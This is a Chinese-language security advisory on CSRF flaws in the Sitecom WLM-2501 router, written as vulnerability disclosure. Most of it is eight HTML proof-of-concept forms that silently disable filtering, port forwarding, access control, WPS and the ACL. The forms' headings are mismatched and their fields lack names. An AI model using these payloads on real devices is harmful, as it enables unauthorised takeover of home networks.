发布日期:2012-03-21
更新日期:2012-03-27
受影响系统:
Sitecom WLM-2501
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52700
Sitecom WLM-2501是无线调制解调器路由器300N,使用Web管理界面,默认监听在TCP/IP端口80,默认管理员是admin,默认ip地址是192.168.0.1。
Sitecom WLM-2501在实现上存在多个跨站请求伪造漏洞,攻击者可利用这些漏洞非法访问受影响设备并执行某些管理员操作,更改下列路由器参数:
- Disable Mac Filtering
- Disable/Modify IP/Port Filtering
- Disable/Modify Port Forwarding
- Disable/Modify Wireless Access Control
- Disable Wi-Fi Protected Setup
- Disable/Modify URL Blocking Filter
- Disable/Modify Domain Blocking Filter
- Disable/Modify IP Address ACL
- Change Wireless Passphrase
- Enable/Modify Remote Access (also on WAN interface)
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Ivano Binetti ()提供了如下测试方法:
3.1 Disable Mac Filtering
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/admin/formFilter">
<input type="hidden" value="1"/>
<input type="hidden" value="1"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="/fw-macfilter.asp"/>
</form>
</body>
</html>
3.2 Disable IP/Port Filtering
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formFilter">
<input type="hidden" value="1"/>
<input type="hidden" value="1"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="/fw-ipportfilter.asp"/>
</form>
</body>
</html>
3.3 Disable Port Forwarding
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formPortFw">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value=""/>
<input type="hidden" value="/fw-portfw.asp"/>
</form>
</body>
</html>
3.4 Disable Wireless Access Control
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/admin/formWlAc">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="/wlactrl.asp"/>
</form>
</body>
</html>
3.5 Disable Wi-Fi Protected Setup
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formWsc">
<input type="hidden" value="OFF"/>
<input type="hidden" value="ON"/>
<input type="hidden" value="/wlwps.asp"/>
<input type="hidden" value="Apply"/>
</form>
</body>
</html>
3.6 Disable URL Blocking Filter
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formURL">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value=""/>
<input type="hidden" value=""/>
<input type="hidden" value="/url_blocking.asp"/>
</form>
</body>
</html>
3.7 Disable Domain Blocking Filter
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formDOMAINBLK">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value=""/>
<input type="hidden" value="/domainblk.asp"/>
</form>
</body>
</html>
3.8 Disable IP Address ACL Filter
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/admin/formACL">
<input type="hidden" value="192.168.0.1"/>
<input type="hidden" value="255.255.255.0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="1"/>
<input type="hidden" value="0"/>
<input type="hidden" value=""/>
<input type="hidden" value=""/>
<input type="hidden" value="/acl.asp"/>
</form>
</body>
</html>
+---------------------------------------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
Sitecom
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: